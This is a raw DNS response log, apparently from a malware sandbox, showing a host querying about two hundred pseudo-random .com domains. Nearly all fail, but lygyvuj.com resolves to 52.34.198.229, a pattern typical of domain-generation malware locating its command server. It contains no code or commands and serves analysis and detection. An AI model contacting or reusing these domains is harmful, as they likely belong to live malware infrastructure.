Aug 23, 2024 18:43:30.004656076 CEST	1.1.1.1	192.168.2.5	0x5c02	Name error (3)	qebyrip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.004666090 CEST	1.1.1.1	192.168.2.5	0xfff1	Name error (3)	gacyqys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.008847952 CEST	1.1.1.1	192.168.2.5	0xa4d8	Name error (3)	vofydut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.009010077 CEST	1.1.1.1	192.168.2.5	0x8ab5	Name error (3)	lygyfir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.009366035 CEST	1.1.1.1	192.168.2.5	0x6d02	Name error (3)	lysyvud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.010061979 CEST	1.1.1.1	192.168.2.5	0xa2df	Name error (3)	gadyduz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.121906042 CEST	1.1.1.1	192.168.2.5	0xa61b	Name error (3)	purypyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.127747059 CEST	1.1.1.1	192.168.2.5	0x571f	Name error (3)	pujygaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.133738995 CEST	1.1.1.1	192.168.2.5	0x8e69	Name error (3)	lymylij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.135586023 CEST	1.1.1.1	192.168.2.5	0x9680	Name error (3)	gatycyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.506321907 CEST	1.1.1.1	192.168.2.5	0xa51c	Name error (3)	qedysyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.507484913 CEST	1.1.1.1	192.168.2.5	0x7c7e	Name error (3)	galynab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.509368896 CEST	1.1.1.1	192.168.2.5	0xb47a	Name error (3)	pumyliq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.509780884 CEST	1.1.1.1	192.168.2.5	0xf3de	Name error (3)	lysysyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.510354042 CEST	1.1.1.1	192.168.2.5	0x944c	Name error (3)	vonykuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.511409044 CEST	1.1.1.1	192.168.2.5	0x1d29	Name error (3)	ganykuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.513515949 CEST	1.1.1.1	192.168.2.5	0x93dd	Name error (3)	vopypec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.514081001 CEST	1.1.1.1	192.168.2.5	0xb577	Name error (3)	qebykul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.516697884 CEST	1.1.1.1	192.168.2.5	0x8cc2	Name error (3)	lyvyjyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.516707897 CEST	1.1.1.1	192.168.2.5	0xa875	Name error (3)	qetytav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.517107964 CEST	1.1.1.1	192.168.2.5	0x7cc5	Name error (3)	puvyjyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.521004915 CEST	1.1.1.1	192.168.2.5	0x1470	Name error (3)	purytov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.521018028 CEST	1.1.1.1	192.168.2.5	0x139f	Name error (3)	lyrytod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.523607969 CEST	1.1.1.1	192.168.2.5	0xa07d	Name error (3)	qeqyrug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.523631096 CEST	1.1.1.1	192.168.2.5	0xf105	Name error (3)	pufycyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.523641109 CEST	1.1.1.1	192.168.2.5	0x6bc7	Name error (3)	puzygop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.523763895 CEST	1.1.1.1	192.168.2.5	0xa693	Name error (3)	volygoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.524605989 CEST	1.1.1.1	192.168.2.5	0xa4a1	Name error (3)	gadycew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.525523901 CEST	1.1.1.1	192.168.2.5	0x9553	Name error (3)	qedyxel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.526245117 CEST	1.1.1.1	192.168.2.5	0xe0a9	Name error (3)	volymaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.526254892 CEST	1.1.1.1	192.168.2.5	0x6636	Name error (3)	gatyzoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.526282072 CEST	1.1.1.1	192.168.2.5	0x1209	Name error (3)	vojyduf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.526933908 CEST	1.1.1.1	192.168.2.5	0xbc19	Name error (3)	puvymaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.527928114 CEST	1.1.1.1	192.168.2.5	0x9764	Name error (3)	lyvymej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.527967930 CEST	1.1.1.1	192.168.2.5	0x21e4	Name error (3)	pujyduv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.527978897 CEST	1.1.1.1	192.168.2.5	0x71e6	Name error (3)	qekyfiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.527987003 CEST	1.1.1.1	192.168.2.5	0x808	Name error (3)	qebyqeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.527997017 CEST	1.1.1.1	192.168.2.5	0x2d62	Name error (3)	pupyxal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.528523922 CEST	1.1.1.1	192.168.2.5	0x16dc	Name error (3)	pupypep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.528554916 CEST	1.1.1.1	192.168.2.5	0x2bd2	Name error (3)	qekynog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.528958082 CEST	1.1.1.1	192.168.2.5	0xb6b7	Name error (3)	lygysen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.528969049 CEST	1.1.1.1	192.168.2.5	0xab48	Name error (3)	lyrylix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.529578924 CEST	1.1.1.1	192.168.2.5	0x9309	Name error (3)	qegysyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.529589891 CEST	1.1.1.1	192.168.2.5	0xefe6	Name error (3)	gaqykus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.529596090 CEST	1.1.1.1	192.168.2.5	0xbdad	Name error (3)	purylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.530397892 CEST	1.1.1.1	192.168.2.5	0xee4b	Name error (3)	qexynol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.530407906 CEST	1.1.1.1	192.168.2.5	0xf1ff	Name error (3)	gacynow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.530419111 CEST	1.1.1.1	192.168.2.5	0xf17b	Name error (3)	lykyfud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.530428886 CEST	1.1.1.1	192.168.2.5	0x760a	Name error (3)	pufypeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.532908916 CEST	1.1.1.1	192.168.2.5	0xa841	Name error (3)	pujybig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.537221909 CEST	1.1.1.1	192.168.2.5	0xfbea	Name error (3)	lykynon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.538368940 CEST	1.1.1.1	192.168.2.5	0x56ca	Name error (3)	gahyvuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.538408995 CEST	1.1.1.1	192.168.2.5	0x35d5	Name error (3)	vojybim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.540194988 CEST	1.1.1.1	192.168.2.5	0x3082	Name error (3)	qegyvuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.540287971 CEST	1.1.1.1	192.168.2.5	0x5c04	Name error (3)	vowyrif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.540616035 CEST	1.1.1.1	192.168.2.5	0xd28c	Name error (3)	vocyjet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.542529106 CEST	1.1.1.1	192.168.2.5	0xa4e8	Name error (3)	qexyhap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.542577982 CEST	1.1.1.1	192.168.2.5	0x3cf1	Name error (3)	gaqyrib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.543448925 CEST	1.1.1.1	192.168.2.5	0x496e	Name error (3)	lyxygax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.544595957 CEST	1.1.1.1	192.168.2.5	0xb6eb	Name error (3)	pumywug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.545706034 CEST	1.1.1.1	192.168.2.5	0x3b30	Name error (3)	gacyhez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.545809984 CEST	1.1.1.1	192.168.2.5	0xa1bc	Name error (3)	lymywun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.548041105 CEST	1.1.1.1	192.168.2.5	0xe837	Name error (3)	galyfis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.549685955 CEST	1.1.1.1	192.168.2.5	0x469e	Name error (3)	lysyxar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.549726963 CEST	1.1.1.1	192.168.2.5	0x583e	Name error (3)	vopyzot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.549738884 CEST	1.1.1.1	192.168.2.5	0x7b9a	Name error (3)	vofycyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.549746990 CEST	1.1.1.1	192.168.2.5	0x43f4	Name error (3)	ganyqyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.551353931 CEST	1.1.1.1	192.168.2.5	0x828f	Name error (3)	gahydyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.551723957 CEST	1.1.1.1	192.168.2.5	0x2cef	Name error (3)	qetylip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.673717976 CEST	1.1.1.1	192.168.2.5	0x4409	Name error (3)	gatypas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.678764105 CEST	1.1.1.1	192.168.2.5	0x7879	Name error (3)	vocymak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.692166090 CEST	1.1.1.1	192.168.2.5	0x5171	Name error (3)	vowykuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.697057962 CEST	1.1.1.1	192.168.2.5	0x255a	No error (0)	lygyvuj.com		52.34.198.229	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.931477070 CEST	1.1.1.1	192.168.2.5	0xfa45	No error (0)	lygyvuj.com		52.34.198.229	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.691889048 CEST	1.1.1.1	192.168.2.5	0x3531	Name error (3)	vofypam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.692909002 CEST	1.1.1.1	192.168.2.5	0xfa0	Name error (3)	qeqykyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.695776939 CEST	1.1.1.1	192.168.2.5	0xeac7	Name error (3)	volybut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697053909 CEST	1.1.1.1	192.168.2.5	0xe799	Name error (3)	puzybil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697063923 CEST	1.1.1.1	192.168.2.5	0xd3f8	Name error (3)	gadypah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697911024 CEST	1.1.1.1	192.168.2.5	0x844b	Name error (3)	lysytoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697920084 CEST	1.1.1.1	192.168.2.5	0x9552	Name error (3)	qekyvup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.697928905 CEST	1.1.1.1	192.168.2.5	0x80f6	Name error (3)	vopyrik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698046923 CEST	1.1.1.1	192.168.2.5	0x7e85	Name error (3)	lykyvyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698056936 CEST	1.1.1.1	192.168.2.5	0x6b3d	Name error (3)	galyvuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698355913 CEST	1.1.1.1	192.168.2.5	0xd0a9	Name error (3)	ganyhab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698457956 CEST	1.1.1.1	192.168.2.5	0xe444	Name error (3)	qebyhag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698678017 CEST	1.1.1.1	192.168.2.5	0xcb0e	Name error (3)	qetyrul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698725939 CEST	1.1.1.1	192.168.2.5	0xc93f	Name error (3)	qedytoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698736906 CEST	1.1.1.1	192.168.2.5	0xe654	Name error (3)	vonyjef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.698828936 CEST	1.1.1.1	192.168.2.5	0x856d	Name error (3)	gahyces.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.701957941 CEST	1.1.1.1	192.168.2.5	0xcd0f	Name error (3)	lygyxad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.702029943 CEST	1.1.1.1	192.168.2.5	0x67f3	Name error (3)	vojycec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.702347994 CEST	1.1.1.1	192.168.2.5	0xc713	Name error (3)	qegyxav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.702763081 CEST	1.1.1.1	192.168.2.5	0xf783	Name error (3)	purywyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.702877045 CEST	1.1.1.1	192.168.2.5	0x88a1	Name error (3)	gacyfih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.702886105 CEST	1.1.1.1	192.168.2.5	0xc2df	Name error (3)	pufyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.702955008 CEST	1.1.1.1	192.168.2.5	0x344f	Name error (3)	gaqyqez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.703085899 CEST	1.1.1.1	192.168.2.5	0xc2f3	Name error (3)	vowyqyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.703557968 CEST	1.1.1.1	192.168.2.5	0xa04	Name error (3)	qexyfuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.706216097 CEST	1.1.1.1	192.168.2.5	0x7248	Name error (3)	lymymax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.706386089 CEST	1.1.1.1	192.168.2.5	0x3f6e	Name error (3)	qeqyqep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.706484079 CEST	1.1.1.1	192.168.2.5	0x82be	Name error (3)	gadyzib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.707518101 CEST	1.1.1.1	192.168.2.5	0x87d	Name error (3)	vofyzof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.707535028 CEST	1.1.1.1	192.168.2.5	0x6f52	Name error (3)	lyxyfuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.707587957 CEST	1.1.1.1	192.168.2.5	0x23ca	Name error (3)	lysylun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.707598925 CEST	1.1.1.1	192.168.2.5	0x7b37	Name error (3)	volydyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.707664967 CEST	1.1.1.1	192.168.2.5	0x8928	Name error (3)	pupylug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.707673073 CEST	1.1.1.1	192.168.2.5	0xc486	Name error (3)	pumymap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.707799911 CEST	1.1.1.1	192.168.2.5	0xc532	Name error (3)	vonymoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.708007097 CEST	1.1.1.1	192.168.2.5	0x86dc	Name error (3)	lykyser.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.708015919 CEST	1.1.1.1	192.168.2.5	0x2d82	Name error (3)	galydyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.708277941 CEST	1.1.1.1	192.168.2.5	0xcb48	Name error (3)	puzyduq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.709132910 CEST	1.1.1.1	192.168.2.5	0x9df9	Name error (3)	qebyniv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.709218979 CEST	1.1.1.1	192.168.2.5	0x48f3	Name error (3)	vopykum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.709557056 CEST	1.1.1.1	192.168.2.5	0x52f1	Name error (3)	gatykyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.709595919 CEST	1.1.1.1	192.168.2.5	0xb744	Name error (3)	pujypal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.709805012 CEST	1.1.1.1	192.168.2.5	0xde5e	Name error (3)	vojypat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.709860086 CEST	1.1.1.1	192.168.2.5	0xaaaa	Name error (3)	gahypoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.709980965 CEST	1.1.1.1	192.168.2.5	0xc895	Name error (3)	qetykyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.712393045 CEST	1.1.1.1	192.168.2.5	0x2e06	Name error (3)	qekysel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.714776039 CEST	1.1.1.1	192.168.2.5	0xf43b	Name error (3)	lymyjyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.715490103 CEST	1.1.1.1	192.168.2.5	0xd83c	Name error (3)	lyxynir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.718683958 CEST	1.1.1.1	192.168.2.5	0x9aca	Name error (3)	pumyjev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.719013929 CEST	1.1.1.1	192.168.2.5	0x21a8	Name error (3)	pujycyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.719063997 CEST	1.1.1.1	192.168.2.5	0xf176	Name error (3)	ganynos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.719904900 CEST	1.1.1.1	192.168.2.5	0x5254	Name error (3)	lyvygon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.721517086 CEST	1.1.1.1	192.168.2.5	0xc117	Name error (3)	gatyruw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.721560001 CEST	1.1.1.1	192.168.2.5	0x38f6	Name error (3)	puvygog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.722762108 CEST	1.1.1.1	192.168.2.5	0x1dff	Name error (3)	vocygim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.726099014 CEST	1.1.1.1	192.168.2.5	0xccd7	Name error (3)	lyrywur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.728883982 CEST	1.1.1.1	192.168.2.5	0xbb8e	Name error (3)	qedylig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.729214907 CEST	1.1.1.1	192.168.2.5	0xb863	Name error (3)	lyvynid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.731545925 CEST	1.1.1.1	192.168.2.5	0xb1e1	Name error (3)	pupytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.731558084 CEST	1.1.1.1	192.168.2.5	0xb523	Name error (3)	puvybuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.732021093 CEST	1.1.1.1	192.168.2.5	0xc3aa	Name error (3)	puryjeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.732850075 CEST	1.1.1.1	192.168.2.5	0x40ec	Name error (3)	vocybuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.733400106 CEST	1.1.1.1	192.168.2.5	0x8ee5	Name error (3)	qegytop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.736141920 CEST	1.1.1.1	192.168.2.5	0xc25a	Name error (3)	lyryjej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.749449968 CEST	1.1.1.1	192.168.2.5	0x3824	Name error (3)	gacyvub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.750056028 CEST	1.1.1.1	192.168.2.5	0x9735	Name error (3)	lygytix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.752593994 CEST	1.1.1.1	192.168.2.5	0xa486	Name error (3)	gaqyhaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.752701044 CEST	1.1.1.1	192.168.2.5	0x2710	Name error (3)	qexyvyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.754793882 CEST	1.1.1.1	192.168.2.5	0x356f	Name error (3)	vofyruc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.754823923 CEST	1.1.1.1	192.168.2.5	0x43a0	Name error (3)	gadyrus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.755150080 CEST	1.1.1.1	192.168.2.5	0x674f	Name error (3)	qedyruv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.755409002 CEST	1.1.1.1	192.168.2.5	0x688f	Name error (3)	pumygil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.755425930 CEST	1.1.1.1	192.168.2.5	0xdef1	Name error (3)	galycah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.756213903 CEST	1.1.1.1	192.168.2.5	0xf753	Name error (3)	pupywyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.756551981 CEST	1.1.1.1	192.168.2.5	0xedcd	Name error (3)	vonygit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.757188082 CEST	1.1.1.1	192.168.2.5	0x7bf4	Name error (3)	ganyfuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.758364916 CEST	1.1.1.1	192.168.2.5	0xbc80	Name error (3)	lykyxoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.758373976 CEST	1.1.1.1	192.168.2.5	0xfbac	Name error (3)	qebyfup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.758865118 CEST	1.1.1.1	192.168.2.5	0x248e	Name error (3)	qekyxaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.760756016 CEST	1.1.1.1	192.168.2.5	0xd226	Name error (3)	vojyzik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.760864019 CEST	1.1.1.1	192.168.2.5	0x74fe	Name error (3)	lyvyfux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.760879993 CEST	1.1.1.1	192.168.2.5	0xa35e	Name error (3)	puvydyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.762274027 CEST	1.1.1.1	192.168.2.5	0x65d7	Name error (3)	qegylul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.762326002 CEST	1.1.1.1	192.168.2.5	0x8721	Name error (3)	gacydes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.762868881 CEST	1.1.1.1	192.168.2.5	0x1ebf	Name error (3)	qexysev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.763446093 CEST	1.1.1.1	192.168.2.5	0x2045	Name error (3)	lyryman.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.763598919 CEST	1.1.1.1	192.168.2.5	0x540b	Name error (3)	gaqynih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.763608932 CEST	1.1.1.1	192.168.2.5	0x4f18	Name error (3)	gahyziw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.763622999 CEST	1.1.1.1	192.168.2.5	0xb7d8	Name error (3)	vocydyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.764719963 CEST	1.1.1.1	192.168.2.5	0x28fc	Name error (3)	pufylul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.764738083 CEST	1.1.1.1	192.168.2.5	0x2960	Name error (3)	qeqyniq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.765317917 CEST	1.1.1.1	192.168.2.5	0x707a	Name error (3)	lyxysad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.765449047 CEST	1.1.1.1	192.168.2.5	0x29e	Name error (3)	volypof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.765465021 CEST	1.1.1.1	192.168.2.5	0xbff7	Name error (3)	vowymom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.765475988 CEST	1.1.1.1	192.168.2.5	0xd8be	Name error (3)	puzypav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.765818119 CEST	1.1.1.1	192.168.2.5	0x96d8	Name error (3)	lykytin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.766220093 CEST	1.1.1.1	192.168.2.5	0x7197	Name error (3)	pumybuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.766277075 CEST	1.1.1.1	192.168.2.5	0x29d5	Name error (3)	gatyhos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.766288996 CEST	1.1.1.1	192.168.2.5	0xb74a	Name error (3)	qedykep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.766366959 CEST	1.1.1.1	192.168.2.5	0x132b	Name error (3)	qebyvyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.767154932 CEST	1.1.1.1	192.168.2.5	0x34a3	Name error (3)	ganyvyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.767311096 CEST	1.1.1.1	192.168.2.5	0xe86f	Name error (3)	vopyjac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.767321110 CEST	1.1.1.1	192.168.2.5	0x10dc	Name error (3)	pupyjap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.767563105 CEST	1.1.1.1	192.168.2.5	0xe724	Name error (3)	qekytig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.768162012 CEST	1.1.1.1	192.168.2.5	0x6253	Name error (3)	qetyhov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.768189907 CEST	1.1.1.1	192.168.2.5	0x46c2	Name error (3)	gadykyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:31.770441055 CEST	1.1.1.1	192.168.2.5	0x7d85	Name error (3)	vowyjak.com	none	none	A (IP address)	IN (0x0001)	false
